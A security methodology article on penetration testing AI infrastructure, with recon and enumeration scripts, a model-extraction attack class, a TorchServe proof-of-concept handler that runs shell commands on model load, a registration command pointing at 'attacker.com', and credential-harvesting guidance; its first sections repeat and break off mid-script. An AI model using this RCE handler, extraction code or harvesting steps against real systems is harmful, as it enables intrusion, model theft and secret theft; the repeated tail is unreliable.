Penetration Testing Methodology for AI Infrastructure

intermediate18 min readUpdated 2026-03-21

A structured methodology for penetration testing AI/ML systems covering reconnaissance, vulnerability assessment, exploitation, and reporting

infrastructure penetration-testing methodology red-team assessment

Overview

Penetration testing AI infrastructure requires extending traditional infrastructure and application testing methodologies with AI-specific techniques. While the standard phases of penetration testing — reconnaissance, scanning, vulnerability assessment, exploitation, and reporting — still apply, the targets, techniques, and impact assessments differ significantly for AI systems.

Traditional penetration tests focus on gaining unauthorized access, escalating privileges, and exfiltrating data. AI infrastructure penetration tests must additionally assess model theft risk, training data exposure, inference manipulation capability, model poisoning vectors, and the security of the ML lifecycle from data collection through deployment. These AI-specific risks map to the MITRE ATLAS framework, which extends ATT&CK with machine learning attack techniques.

The scope of an AI infrastructure penetration test typically includes: model serving endpoints and their management interfaces, training cluster infrastructure (GPU nodes, schedulers, shared storage), ML pipeline orchestration (Kubeflow, Airflow, custom systems), model and artifact registries (MLflow, Weights & Biases, custom registries), data storage and feature stores, experiment tracking and monitoring systems, and the CI/CD pipeline for model deployment. Each of these components has unique vulnerability patterns that require specialized testing approaches.

This article presents a comprehensive penetration testing methodology for AI infrastructure, organized into phases with specific techniques, tools, and deliverables for each phase. The methodology is informed by OWASP, PTES (Penetration Testing Execution Standard), NIST AI RMF, and MITRE ATLAS.

Phase 1: Reconnaissance and Scoping

Passive Reconnaissance

Before any active testing, gather information about the target AI infrastructure through passive means:

"""
AI infrastructure reconnaissance toolkit.
Gathers information about target AI systems through passive
and semi-passive techniques.
"""
 
import re
import json
import socket
from typing import Optional
from dataclasses import dataclass, field
from urllib.parse import urlparse
 
@dataclass
class ReconResult:
    """Structured reconnaissance findings."""
    target: str
    ml_frameworks: list[str] = field(default_factory=list)
    serving_endpoints: list[dict] = field(default_factory=list)
    storage_buckets: list[str] = field(default_factory=list)
    exposed_dashboards: list[dict] = field(default_factory=list)
    gpu_infrastructure: list[str] = field(default_factory=list)
    api_endpoints: list[dict] = field(default_factory=list)
    credentials_found: list[dict] = field(default_factory=list)
 
class AIInfraRecon:
    """
    Passive and semi-passive reconnaissance for AI infrastructure.
    """
 
    # Common ports for AI services
    AI_SERVICE_PORTS = {
        5000: "MLflow Tracking Server",
        5001: "MLflow Model Serving",
        6006: "TensorBoard",
        6007: "TensorBoard (alt)",
        8000: "Triton HTTP / vLLM",
        8001: "Triton gRPC",
        8002: "Triton Metrics",
        8080: "TorchServe Inference / Seldon",
        8081: "TorchServe Management",
        8082: "TorchServe Metrics",
        8265: "Ray Dashboard",
        8443: "Kubeflow Dashboard",
        8501: "TensorFlow Serving REST",
        8500: "TensorFlow Serving gRPC",
        8786: "Dask Scheduler",
        8787: "Dask Dashboard",
        8888: "Jupyter Notebook",
        9090: "Prometheus",
        3000: "Grafana",
        9001: "MinIO Console",
        9000: "MinIO API",
        4040: "Spark UI",
        18080: "Spark History",
        8998: "Livy (Spark REST)",
    }
 
    # Known paths for AI service fingerprinting
    FINGERPRINT_PATHS = {
        "/api/2.0/mlflow/experiments/list": "MLflow",
        "/v2": "Triton Inference Server",
        "/v1/models": "vLLM / OpenAI API",
        "/api/sessions": "Jupyter Notebook",
        "/api/kernels": "Jupyter Notebook",
        "/models": "TorchServe",
        "/v1/models/": "TensorFlow Serving",
        "/data/runs": "TensorBoard",
        "/api/v1/nodes": "Ray",
        "/pipeline/apis/v2beta1/pipelines": "Kubeflow Pipelines",
        "/_/healthz": "Kubeflow",
    }
 
    def __init__(self, target: str):
        self.target = target
        self.result = ReconResult(target=target)
 
    def scan_ai_ports(self, timeout: float = 2.0) -> list[dict]:
        """
        Scan for common AI service ports.
        Semi-passive: connects but does not send exploits.
        """
        open_ports = []
        for port, service in self.AI_SERVICE_PORTS.items():
            try:
                sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
                sock.settimeout(timeout)
                result = sock.connect_ex((self.target, port))
                sock.close()
 
                if result == 0:
                    open_ports.append({
                        "port": port,
                        "service": service,
                        "state": "open",
                    })
            except (socket.error, OSError):
                continue
 
        self.result.serving_endpoints.extend(open_ports)
        return open_ports
 
    def analyze_github_repos(self, org_name: str) -> dict:
        """
        Analyze public GitHub repositories for AI infrastructure details.
        Looks for ML framework usage, model configurations, and
        accidentally committed credentials.
 
        Note: This is a pattern-based analysis. Actual implementation
        would use GitHub's search API or clone public repos.
        """
        # Patterns to search for in public repos
        search_patterns = {
            "ml_frameworks": [
                "import torch", "import tensorflow",
                "from transformers import", "import sklearn",
                "import onnxruntime",
            ],
            "infrastructure": [
                "sagemaker", "kubeflow", "mlflow",
                "triton_client", "torchserve",
                "ray.serve", "seldon",
            ],
            "credentials": [
                "aws_access_key_id", "GOOGLE_APPLICATION_CREDENTIALS",
                "MLFLOW_TRACKING_URI", "WANDB_API_KEY",
                "HF_TOKEN", "OPENAI_API_KEY",
            ],
            "model_configs": [
                "model_config.pbtxt",  # Triton
                "config.properties",  # TorchServe
                "serving_config",
            ],
        }
 
        return {
            "org": org_name,
            "patterns": search_patterns,
            "note": (
                "Search these patterns in public repos using GitHub "
                "code search: site:github.com org:<org_name>"
            ),
        }
 
    def enumerate_cloud_storage(self, company_name: str) -> list[str]:
        """
        Generate candidate bucket/container names for AI assets
        based on common naming conventions.
        """
        prefixes = [company_name, company_name.replace("-", ""), company_name.lower()]
        suffixes = [
            "training-data", "models", "datasets", "ml-artifacts",
            "model-registry", "checkpoints", "embeddings",
            "sagemaker", "mlflow", "feature-store",
            "pipeline-data", "experiment-artifacts",
        ]
 
        candidates = []
        for prefix in prefixes:
            for suffix in suffixes:
                candidates.append(f"{prefix}-{suffix}")
                candidates.append(f"{prefix}.{suffix}")
 
        self.result.storage_buckets = candidates
        return candidates
 
    def generate_report(self) -> str:
        """Generate a structured recon report."""
        report = {
            "target": self.target,
            "phase": "reconnaissance",
            "findings": {
                "open_ai_ports": self.result.serving_endpoints,
                "candidate_storage": self.result.storage_buckets,
                "ml_frameworks": self.result.ml_frameworks,
            },
            "next_steps": [
                "Fingerprint open services to identify versions",
                "Test candidate storage buckets for public access",
                "Analyze service APIs for authentication requirements",
                "Map internal network topology from exposed services",
            ],
        }
        return json.dumps(report, indent=2)

Active Enumeration

After passive reconnaissance, perform active enumeration to identify specific services, versions, and configurations:

#!/usr/bin/env bash
# Active enumeration of AI infrastructure services
# Run after passive recon to fingerprint discovered services
 
TARGET="${1:?Usage: $0 <target_host>}"
echo "=== AI Infrastructure Active Enumeration ==="
echo "Target: $TARGET"
echo ""
 
# Port scan focused on AI services
echo "--- Port Scanning (AI service ports) ---"
nmap -sV -p 3000,4040,5000,5001,6006,8000-8002,8080-8082,8265,8443,8500,8501,8786-8788,8888,8998,9000,9001,9090,18080 \
    --open -oN "ai_ports_${TARGET}.txt" "$TARGET" 2>/dev/null
 
echo ""
echo "--- Service Fingerprinting ---"
 
# Test each discovered service for identity and version
for port in 5000 8000 8080 8501 8888; do
    echo "Port $port:"
 
    # Generic HTTP fingerprint
    RESP=$(curl -s --connect-timeout 3 -D - "http://${TARGET}:${port}/" 2>/dev/null | head -20)
    if [ -n "$RESP" ]; then
        echo "$RESP" | grep -iE "server:|x-powered|content-type" || true
    fi
 
    # Try AI-specific endpoints
    for path in "/v2" "/models" "/v1/models" "/api/2.0/mlflow/experiments/list" "/api/sessions" "/health"; do
        HTTP_CODE=$(curl -s -o /dev/null -w "%{http_code}" \
            --connect-timeout 3 "http://${TARGET}:${port}${path}" 2>/dev/null)
        if [ "$HTTP_CODE" = "200" ] || [ "$HTTP_CODE" = "401" ]; then
            echo "  ${path} -> HTTP ${HTTP_CODE}"
        fi
    done
    echo ""
done
 
echo "--- Model API Probing ---"
# Test for OpenAI-compatible API (vLLM, LiteLLM, etc.)
MODELS_RESP=$(curl -s --connect-timeout 3 "http://${TARGET}:8000/v1/models" 2>/dev/null)
if echo "$MODELS_RESP" | python3 -c "import sys,json; json.load(sys.stdin)" 2>/dev/null; then
    echo "OpenAI-compatible API found on port 8000:"
    echo "$MODELS_RESP" | python3 -m json.tool 2>/dev/null
fi
 
echo ""
echo "=== Enumeration Complete ==="
echo "Results saved to ai_ports_${TARGET}.txt"

Phase 2: Vulnerability Assessment

AI-Specific Vulnerability Checklist

Map discovered services to known vulnerability patterns using MITRE ATLAS techniques:

ATLAS Technique	Infrastructure Target	Test Method
AML.T0024 - Exfiltration via ML Inference API	Model serving endpoints	Query model to extract training data or model architecture
AML.T0020 - Poison Training Data	Data storage, pipelines	Test write access to training data locations
AML.T0010 - ML Supply Chain Compromise	Model registries, package repos	Check for unsigned models, vulnerable dependencies
AML.T0043 - Craft Adversarial Data	Inference endpoints	Submit adversarial inputs to test model robustness
AML.T0048 - Resource Hijacking	GPU schedulers, compute nodes	Test for unauthorized compute access

"""
AI infrastructure vulnerability assessment engine.
Maps discovered services to known vulnerability patterns
and generates a prioritized testing plan.
"""
 
import json
from dataclasses import dataclass, field
from typing import Optional
from enum import Enum
 
class RiskLevel(Enum):
    CRITICAL = "critical"
    HIGH = "high"
    MEDIUM = "medium"
    LOW = "low"
    INFO = "info"
 
@dataclass
class VulnerabilityCheck:
    """A single vulnerability check to perform."""
    check_id: str
    name: str
    atlas_technique: str
    risk_level: RiskLevel
    target_service: str
    description: str
    test_procedure: str
    remediation: str
 
# Vulnerability check database for AI infrastructure
AI_VULN_CHECKS = [
    VulnerabilityCheck(
        check_id="AI-SERVE-001",
        name="Unauthenticated Model Management API",
        atlas_technique="AML.T0010",
        risk_level=RiskLevel.CRITICAL,
        target_service="TorchServe",
        description=(
            "TorchServe management API (port 8081) allows model "
            "registration, which executes arbitrary Python code."
        ),
        test_procedure=(
            "1. Attempt GET /models on port 8081\n"
            "2. If accessible, attempt POST /models with a test URL\n"
            "3. Check for SSRF by using internal URLs"
        ),
        remediation=(
            "Bind management API to localhost. Use network policies "
            "to restrict access. Upgrade to >= 0.8.2."
        ),
    ),
    VulnerabilityCheck(
        check_id="AI-SERVE-002",
        name="Model Information Disclosure",
        atlas_technique="AML.T0024",
        risk_level=RiskLevel.MEDIUM,
        target_service="Triton/vLLM/TorchServe",
        description=(
            "Model metadata endpoints expose architecture details, "
            "input/output shapes, and version information."
        ),
        test_procedure=(
            "1. Query /v2/models/<name>/config (Triton)\n"
            "2. Query /v1/models (vLLM)\n"
            "3. Query /models/<name> (TorchServe)\n"
            "4. Document exposed information"
        ),
        remediation=(
            "Restrict metadata endpoints to authenticated clients. "
            "Remove unnecessary model configuration details."
        ),
    ),
    VulnerabilityCheck(
        check_id="AI-DATA-001",
        name="Training Data Storage Public Access",
        atlas_technique="AML.T0020",
        risk_level=RiskLevel.CRITICAL,
        target_service="S3/GCS/Azure Blob",
        description=(
            "Training data in publicly accessible cloud storage "
            "can be read or modified by anyone."
        ),
        test_procedure=(
            "1. Enumerate bucket names using naming conventions\n"
            "2. Test each for public listing (GET /)\n"
            "3. Test for public object access\n"
            "4. Test for public write access"
        ),
        remediation=(
            "Enable Block Public Access at account level. "
            "Enable versioning and Object Lock."
        ),
    ),
    VulnerabilityCheck(
        check_id="AI-PIPE-001",
        name="Unauthenticated Pipeline Orchestrator",
        atlas_technique="AML.T0010",
        risk_level=RiskLevel.CRITICAL,
        target_service="Kubeflow/Airflow",
        description=(
            "Pipeline orchestrators without authentication allow "
            "submission of arbitrary pipeline runs."
        ),
        test_procedure=(
            "1. Access Kubeflow dashboard (port 8443)\n"
            "2. Attempt to create a pipeline run\n"
            "3. Check Airflow webserver (port 8080) for auth\n"
            "4. Test Airflow REST API"
        ),
        remediation=(
            "Enable authentication (OIDC for Kubeflow, "
            "RBAC for Airflow). Use network policies."
        ),
    ),
    VulnerabilityCheck(
        check_id="AI-GPU-001",
        name="GPU Memory Cross-Tenant Leakage",
        atlas_technique="AML.T0024",
        risk_level=RiskLevel.HIGH,
        target_service="GPU Clusters",
        description=(
            "GPU memory may not be cleared between job allocations, "
            "allowing one tenant to read another's model weights or data."
        ),
        test_procedure=(
            "1. Run a GPU job that writes known patterns to GPU memory\n"
            "2. Release the GPU allocation\n"
            "3. Run another job on the same GPU\n"
            "4. Read GPU memory for residual patterns"
        ),
        remediation=(
            "Enable NVIDIA MPS/MIG for isolation. Use CUDA_VISIBLE_DEVICES. "
            "Clear GPU memory between allocations in the scheduler."
        ),
    ),
]
 
class VulnerabilityAssessment:
    """
    Manage and execute AI infrastructure vulnerability assessments.
    """
 
    def __init__(self):
        self.checks = AI_VULN_CHECKS
        self.results: list[dict] = []
 
    def get_applicable_checks(
        self, discovered_services: list[str],
    ) -> list[VulnerabilityCheck]:
        """
        Filter vulnerability checks to those applicable
        to discovered services.
        """
        applicable = []
        for check in self.checks:
            target_lower = check.target_service.lower()
            for service in discovered_services:
                service_lower = service.lower()
                # Match if any part of the target matches a discovered service
                targets = target_lower.split("/")
                if any(t in service_lower for t in targets):
                    applicable.append(check)
                    break
        return applicable
 
    def generate_test_plan(
        self, discovered_services: list[str],
    ) -> str:
        """Generate a prioritized test plan based on discovered services."""
        applicable = self.get_applicable_checks(discovered_services)
 
        # Sort by risk level
        risk_order = {
            RiskLevel.CRITICAL: 0,
            RiskLevel.HIGH: 1,
            RiskLevel.MEDIUM: 2,
            RiskLevel.LOW: 3,
            RiskLevel.INFO: 4,
        }
        applicable.sort(key=lambda c: risk_order[c.risk_level])
 
        plan = {
            "total_checks": len(applicable),
            "by_risk": {},
            "checks": [],
        }
 
        for check in applicable:
            risk = check.risk_level.value
            plan["by_risk"][risk] = plan["by_risk"].get(risk, 0) + 1
            plan["checks"].append({
                "id": check.check_id,
                "name": check.name,
                "risk": risk,
                "atlas": check.atlas_technique,
                "target": check.target_service,
                "procedure": check.test_procedure,
            })
 
        return json.dumps(plan, indent=2)

Phase 3: Exploitation

Model Theft via Inference API

One of the highest-impact AI-specific exploits is model theft through the inference API. By systematically querying the model with crafted inputs and collecting outputs, an attacker can train a surrogate model that replicates the target's behavior.

"""
Model extraction attack demonstration for penetration testing.
Queries a target model API systematically to collect input-output
pairs for training a surrogate model.
 
WARNING: For authorized penetration testing only.
"""
 
import requests
import numpy as np
import json
import time
from typing import Optional
from pathlib import Path
 
class ModelExtractionAttack:
    """
    Extract a target model's behavior through API queries.
    Uses active learning to minimize the number of queries needed.
    """
 
    def __init__(
        self,
        target_url: str,
        model_name: str = "default",
        rate_limit: float = 0.1,  # seconds between requests
    ):
        self.target_url = target_url.rstrip("/")
        self.model_name = model_name
        self.rate_limit = rate_limit
        self.query_count = 0
        self.collected_pairs: list[dict] = []
 
    def query_model(
        self,
        input_data: dict,
        timeout: int = 30,
    ) -> Optional[dict]:
        """Send a single query to the target model."""
        try:
            resp = requests.post(
                f"{self.target_url}/v1/completions",
                json={
                    "model": self.model_name,
                    "prompt": input_data.get("prompt", ""),
                    "max_tokens": input_data.get("max_tokens", 100),
                    "temperature": 0.0,  # Deterministic for extraction
                    "logprobs": 5,  # Request logprobs if available
                },
                timeout=timeout,
            )
            self.query_count += 1
 
            if resp.status_code == 200:
                return resp.json()
            elif resp.status_code == 429:
                # Rate limited — back off
                time.sleep(5)
                return None
            else:
                return None
 
        except requests.RequestException:
            return None
 
    def generate_extraction_queries(
        self,
        domain: str = "general",
        num_queries: int = 1000,
    ) -> list[dict]:
        """
        Generate a diverse set of queries designed to map the
        model's behavior across its input space.
        """
        queries = []
 
        # Strategy 1: Systematic prompt variations
        base_prompts = [
            "The capital of {} is",
            "Translate to French: {}",
            "Summarize: {}",
            "The opposite of {} is",
            "Define the word: {}",
        ]
 
        # Strategy 2: Length-varied inputs to map context window behavior
        for length in [10, 50, 100, 500]:
            queries.append({
                "prompt": "word " * length,
                "max_tokens": 50,
                "strategy": "length_probe",
            })
 
        # Strategy 3: Special token probing
        special_tokens = [
            "<|endoftext|>", "[INST]", "<<SYS>>",
            "<s>", "</s>", "[PAD]",
        ]
        for token in special_tokens:
            queries.append({
                "prompt": f"Repeat: {token}",
                "max_tokens": 50,
                "strategy": "token_probe",
            })
 
        return queries[:num_queries]
 
    def run_extraction(
        self,
        num_queries: int = 100,
        output_path: str = "extraction_results.jsonl",
    ) -> dict:
        """
        Execute the model extraction attack.
        Collects input-output pairs for surrogate model training.
        """
        queries = self.generate_extraction_queries(num_queries=num_queries)
 
        with open(output_path, "w") as f:
            for i, query in enumerate(queries):
                result = self.query_model(query)
                if result:
                    pair = {
                        "input": query,
                        "output": result,
                        "query_num": i,
                    }
                    f.write(json.dumps(pair) + "\n")
                    self.collected_pairs.append(pair)
 
                time.sleep(self.rate_limit)
 
                if (i + 1) % 100 == 0:
                    print(
                        f"Progress: {i + 1}/{len(queries)} queries, "
                        f"{len(self.collected_pairs)} successful"
                    )
 
        return {
            "total_queries": self.query_count,
            "successful_pairs": len(self.collected_pairs),
            "output_file": output_path,
        }

Pipeline Exploitation: Arbitrary Code via Model Registration

When a model serving framework supports dynamic model loading with custom handlers (TorchServe, Triton Python backend), registering a malicious model achieves remote code execution. This is a critical exploitation technique in AI penetration testing.

"""
Generate a proof-of-concept malicious model archive for TorchServe.
The model handler executes a benign command to demonstrate RCE
capability without causing harm.
 
WARNING: For authorized penetration testing only.
"""
 
import os
import zipfile
import json
import tempfile
from pathlib import Path
 
def create_poc_torchserve_handler(command: str = "id") -> str:
    """
    Create a TorchServe handler that executes a command
    when the model is loaded or when inference is called.
    """
    handler_code = f'''
import subprocess
import logging
from ts.torch_handler.base_handler import BaseHandler
 
logger = logging.getLogger(__name__)
 
class PoCHandler(BaseHandler):
    """
    Proof of concept handler that demonstrates code execution
    during model initialization (load-time RCE).
    """
 
    def initialize(self, context):
        """Called when the model is loaded. Executes the PoC command."""
        logger.info("PoC handler initialized")
        # Execute benign command to prove RCE capability
        try:
            result = subprocess.run(
                ["{command}"],
                capture_output=True, text=True, timeout=5, shell=True,
            )
            logger.info(f"PoC output: {{result.stdout}}")
            # Write proof to a known location
            with open("/tmp/pentest_poc_output.txt", "w") as f:
                f.write(f"Command: {command}\\n")
                f.write(f"Output: {{result.stdout}}\\n")
                f.write(f"PoC successful - RCE demonstrated\\n")
        except Exception as e:
            logger.error(f"PoC failed: {{e}}")
 
        # Initialize a minimal model so inference still works
        self.initialized = True
 
    def handle(self, data, context):
        """Handle inference requests."""
        return ["PoC model loaded successfully"]
'''
    return handler_code
 
def create_mar_archive(
    output_path: str,
    model_name: str = "security_test",
    command: str = "id && hostname && whoami",
) -> str:
    """
    Create a .mar (Model ARchive) file for TorchServe
    containing the proof-of-concept handler.
    """
    with tempfile.TemporaryDirectory() as tmpdir:
        # Create handler file
        handler_path = os.path.join(tmpdir, "handler.py")
        with open(handler_path, "w") as f:
            f.write(create_poc_torchserve_handler(command))
 
        # Create a minimal model file (required by .mar format)
        model_path = os.path.join(tmpdir, "model.pt")
        with open(model_path, "wb") as f:
            f.write(b"PLACEHOLDER")  # Minimal content
 
        # Create MAR-INFO file
        manifest = {
            "createdOn": "2026-03-21",
            "runtime": "python",
            "model": {
                "modelName": model_name,
                "handler": "handler.py",
            },
        }
        manifest_path = os.path.join(tmpdir, "MAR-INF/MANIFEST.json")
        os.makedirs(os.path.dirname(manifest_path), exist_ok=True)
        with open(manifest_path, "w") as f:
            json.dump(manifest, f)
 
        # Package into ZIP (.mar is a ZIP file)
        mar_path = output_path if output_path.endswith(".mar") else f"{output_path}.mar"
        with zipfile.ZipFile(mar_path, "w", zipfile.ZIP_DEFLATED) as zf:
            zf.write(handler_path, "handler.py")
            zf.write(model_path, "model.pt")
            zf.write(manifest_path, "MAR-INF/MANIFEST.json")
 
    return mar_path
 
if __name__ == "__main__":
    import sys
    output = sys.argv[1] if len(sys.argv) > 1 else "security_test.mar"
    mar_file = create_mar_archive(output)
    print(f"PoC .mar archive created: {mar_file}")
    print(f"Register with: curl -X POST 'http://target:8081/models?"
          f"url=http://attacker.com/{os.path.basename(mar_file)}'")

Credential Harvesting from AI Infrastructure

AI infrastructure is a rich target for credential harvesting because:

Training jobs often have IAM roles with access to data lakes, model registries, and cloud services
Jupyter notebooks frequently contain inline AWS keys, database passwords, and API tokens
MLflow and experiment tracking systems store artifact locations that reveal cloud storage paths
Environment variables in containerized AI services often contain secrets

During penetration testing, focus on these credential sources:

Kubernetes secrets in AI namespaces (check for base64-encoded credentials in mounted volumes)
Environment variables in GPU pod specifications
Jupyter notebook content (search for API_KEY, SECRET, PASSWORD, connection strings)
MLflow artifact URIs (reveal S3/GCS bucket paths and potentially access keys)
Docker image layers (credentials baked into container images during build)

Phase 4: Reporting

AI penetration test reports should include standard penetration testing sections plus AI-specific risk assessments. Key additions:

Model theft risk assessment: Quantify how many queries would be needed to extract a functionally equivalent model, and whether rate limiting is sufficient to prevent this.
Data poisoning impact assessment: If write access to training data was achieved, describe the potential impact on model behavior.
MITRE ATLAS mapping: Map all findings to ATLAS techniques for consistent communication.
AI regulatory compliance: Note findings relevant to the EU AI Act, NIST AI RMF, or industry-specific AI regulations.

Report Template Structure

A well-structured AI penetration test report should follow this outline:

Executive Summary: Business impact of findings, overall risk posture, comparison with industry benchmarks.
Scope and Methodology: Components tested, testing approach (black-box, grey-box, white-box), time frame, tools used, ATLAS techniques covered.
Findings Summary Table: Each finding with severity, ATLAS mapping, affected component, and remediation status.
Detailed Findings: For each finding:
- Description and technical detail
- Steps to reproduce
- Evidence (screenshots, logs, captured data)
- ATLAS technique mapping
- Business impact assessment
- Remediation recommendation with priority
AI-Specific Risk Assessment:
- Model theft feasibility analysis (estimated queries needed, current rate limiting effectiveness)
- Data poisoning vector analysis (which training data stores are writable, what controls exist)
- Inference manipulation risk (can inputs be crafted to produce attacker-desired outputs)
- Supply chain risk (model dependencies, unsigned artifacts, unverified packages)
Remediation Roadmap: Prioritized list of remediations with effort estimates and suggested timelines.

Defense and Mitigation

Scope AI systems in all penetration tests: AI infrastructure should be explicitly in-scope for penetration testing, not treated as a separate system. Coordinate with ML engineering teams to define realistic threat scenarios.

Implement AI-specific detection: Deploy monitoring for model extraction attempts (anomalous query patterns), data poisoning indicators (unexpected changes in training data), and unauthorized model access.

Adopt MITRE ATLAS as a framework: Use ATLAS to systematically assess coverage of AI attack techniques and prioritize defenses based on organizational risk.

Regular testing cadence: AI systems change rapidly as models are updated and pipelines evolve. Quarterly penetration testing or continuous red teaming is more appropriate than annual assessments.

Integrate findings into AI governance: Penetration test findings should feed into the organization's AI risk management framework (aligned with NIST AI RMF) and influence model deployment decisions.

Establish AI red team capabilities: Build internal teams or engage specialized firms with expertise in both traditional penetration testing and AI/ML security. The intersection of these skill sets is rare and valuable. Red team exercises that simulate advanced persistent threats targeting AI systems provide the most realistic assessment of organizational readiness.

Create reproducible test environments: Maintain staging environments that mirror production AI infrastructure for safe penetration testing. These environments should include representative model deployments, sample training data, and realistic pipeline configurations so that tests accurately reflect production risk without endangering production systems.

Test the full ML lifecycle: Do not limit penetration testing to the serving layer. Test the entire ML lifecycle: data ingestion and validation pipelines, training infrastructure and job scheduling, model registry and artifact management, deployment automation and rollback mechanisms, and monitoring and alerting systems. Each phase has unique vulnerabilities. A comprehensive test that follows data from ingestion through training to deployment mirrors the attacker's perspective and identifies vulnerabilities at trust boundary transitions that single-component testing would miss. Pay particular attention to the handoff points between systems — where data leaves one component's security boundary and enters another's. These boundary crossings are where the most impactful vulnerabilities hide because they often lack the consistent security controls found within individual components.

References

MITRE. (2024). "ATLAS: Adversarial Threat Landscape for AI Systems." https://atlas.mitre.org/
OWASP. (2025). "OWASP Machine Learning Security Top 10." https://owasp.org/www-project-machine-learning-security-top-10/
NIST. (2023). "AI Risk Management Framework (AI RMF 1.0)." https://airc.nist.gov/AI_RMF_Interactivity/
Penetration Testing Execution Standard (PTES). http://www.pentest-standard.org/
European Union. (2024). "EU AI Act." Regulation laying down harmonized rules on artificial intelligence. https://artificialintelligenceact.eu/
Grosse, K., et al. (2023). "Machine Learning Security: Threats, Countermeasures, and Evaluations." IEEE Access. https://ieeexplore.ieee.org/

Edit this page on GitHub

Penetration Testing Methodology for AI Infrastructure

intermediate18 min readUpdated 2026-03-21

A structured methodology for penetration testing AI/ML systems covering reconnaissance, vulnerability assessment, exploitation, and reporting

infrastructure penetration-testing methodology red-team assessment

Overview

Phase 1: Reconnaissance and Scoping

Passive Reconnaissance

Before any active testing, gather information about the target AI infrastructure through passive means:

"""
AI infrastructure reconnaissance toolkit.
Gathers information about target AI systems through passive
and semi-passive techniques.
"""
 
import re
import json
import socket
from typing import Optional
from dataclasses import dataclass, field
from urllib.parse import urlparse
 
@dataclass
class ReconResult:
    """Structured reconnaissance findings."""
    target: str
    ml_frameworks: list[str] = field(default_factory=list)
    serving_endpoints: list[dict] = field(default_factory=list)
    storage_buckets: list[str] = field(default_factory=list)
    exposed_dashboards: list[dict] = field(default_factory=list)
    gpu_infrastructure: list[str] = field(default_factory=list)
    api_endpoints: list[dict] = field(default_factory=list)
    credentials_found: list[dict] = field(default_factory=list)
 
class AIInfraRecon:
    """
    Passive and semi-passive reconnaissance for AI infrastructure.
    """
 
    # Common ports for AI services
    AI_SERVICE_PORTS = {
        5000: "MLflow Tracking Server",
        5001: "MLflow Model Serving",
        6006: "TensorBoard",
        6007: "TensorBoard (alt)",
        8000: "Triton HTTP / vLLM",
        8001: "Triton gRPC",
        8002: "Triton Metrics",
        8080: "TorchServe Inference / Seldon",
        8081: "TorchServe Management",
        8082: "TorchServe Metrics",
        8265: "Ray Dashboard",
        8443: "Kubeflow Dashboard",
        8501: "TensorFlow Serving REST",
        8500: "TensorFlow Serving gRPC",
        8786: "Dask Scheduler",
        8787: "Dask Dashboard",
        8888: "Jupyter Notebook",
        9090: "Prometheus",
        3000: "Grafana",
        9001: "MinIO Console",
        9000: "MinIO API",
        4040: "Spark UI",
        18080: "Spark History",
        8998: "Livy (Spark REST)",
    }
 
    # Known paths for AI service fingerprinting
    FINGERPRINT_PATHS = {
        "/api/2.0/mlflow/experiments/list": "MLflow",
        "/v2": "Triton Inference Server",
        "/v1/models": "vLLM / OpenAI API",
        "/api/sessions": "Jupyter Notebook",
        "/api/kernels": "Jupyter Notebook",
        "/models": "TorchServe",
        "/v1/models/": "TensorFlow Serving",
        "/data/runs": "TensorBoard",
        "/api/v1/nodes": "Ray",
        "/pipeline/apis/v2beta1/pipelines": "Kubeflow Pipelines",
        "/_/healthz": "Kubeflow",
    }
 
    def __init__(self, target: str):
        self.target = target
        self.result = ReconResult(target=target)
 
    def scan_ai_ports(self, timeout: float = 2.0) -> list[dict]:
        """
        Scan for common AI service ports.
        Semi-passive: connects but does not send exploits.
        """
        open_ports = []
        for port, service in self.AI_SERVICE_PORTS.items():
            try:
                sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
                sock.settimeout(timeout)
                result = sock.connect_ex((self.target, port))
                sock.close()
 
                if result == 0:
                    open_ports.append({
                        "port": port,
                        "service": service,
                        "state": "open",
                    })
            except (socket.error, OSError):
                continue
 
        self.result.serving_endpoints.extend(open_ports)
        return open_ports
 
    def analyze_github_repos(self, org_name: str) -> dict:
        """
        Analyze public GitHub repositories for AI infrastructure details.
        Looks for ML framework usage, model configurations, and
        accidentally committed credentials.
 
        Note: This is a pattern-based analysis. Actual implementation
        would use GitHub's search API or clone public repos.
        """
        # Patterns to search for in public repos
        search_patterns = {
            "ml_frameworks": [
                "import torch", "import tensorflow",
                "from transformers import", "import sklearn",
                "import onnxruntime",
            ],
            "infrastructure": [
                "sagemaker", "kubeflow", "mlflow",
                "triton_client", "torchserve",
                "ray.serve", "seldon",
            ],
            "credentials": [
                "aws_access_key_id", "GOOGLE_APPLICATION_CREDENTIALS",
                "MLFLOW_TRACKING_URI", "WANDB_API_KEY",
                "HF_TOKEN", "OPENAI_API_KEY",
            ],
            "model_configs": [
                "model_config.pbtxt",  # Triton
                "config.properties",  # TorchServe
                "serving_config",
            ],
        }
 
        return {
            "org": org_name,
            "patterns": search_patterns,
            "note": (
                "Search these patterns in public repos using GitHub "
                "code search: site:github.com org:<org_name>"
            ),
        }
 
    def enumerate_cloud_storage(self, company_name: str) -> list[str]:
        """
        Generate candidate bucket/container names for AI assets
        based on common naming conventions.
        """
        prefixes = [company_name, company_name.replace("-", ""), company_name.lower()]
        suffixes = [
            "training-data", "models", "datasets", "ml-artifacts",
            "model-registry", "checkpoints", "embeddings",
            "sagemaker", "mlflow", "feature-store",
            "pipeline-data", "experiment-artifacts",
        ]
 
        candidates = []
        for prefix in prefixes:
            for suffix in suffixes:
                candidates.append(f"{prefix}-{suffix}")
                candidates.append(f"{prefix}.{suffix}")
 
        self.result.storage_buckets = candidates
        return candidates
 
    def generate_report(self) -> str:
        """Generate a structured recon report."""
        report = {
            "target": self.target,
            "phase": "reconnaissance",
            "findings": {
                "open_ai_ports": self.result.serving_endpoints,
                "candidate_storage": self.result.storage_buckets,
                "ml_frameworks": self.result.ml_frameworks,
            },
            "next_steps": [
                "Fingerprint open services to identify versions",
                "Test candidate storage buckets for public access",
                "Analyze service APIs for authentication requirements",
                "Map internal network topology from exposed services",
            ],
        }
        return json.dumps(report, indent=2)

Active Enumeration

After passive reconnaissance, perform active enumeration to identify specific services, versions, and configurations:

#!/usr/bin/env bash
# Active enumeration of AI infrastructure services
# Run after passive recon to fingerprint discovered services
 
TARGET="${1:?Usage: $0 <target_host>}"
echo "=== AI Infrastructure Active Enumeration ==="
echo "Target: $TARGET"
echo ""
 
# Port scan focused on AI services
echo "--- Port Scanning (AI service ports) ---"
nmap -sV -p 3000,4040,5000,5001,6006,8000-8002,8080-8082,8265,8443,8500,8501,8786-8788,8888,8998,9000,9001,9090,18080 \
    --open -oN "ai_ports_${TARGET}.txt" "$TARGET" 2>/dev/null
 
echo ""
echo "--- Service Fingerprinting ---"
 
# Test each discovered service for identity and version
for port in 5000 8000 8080 8501 8888; do
    echo "Port $port:"
 
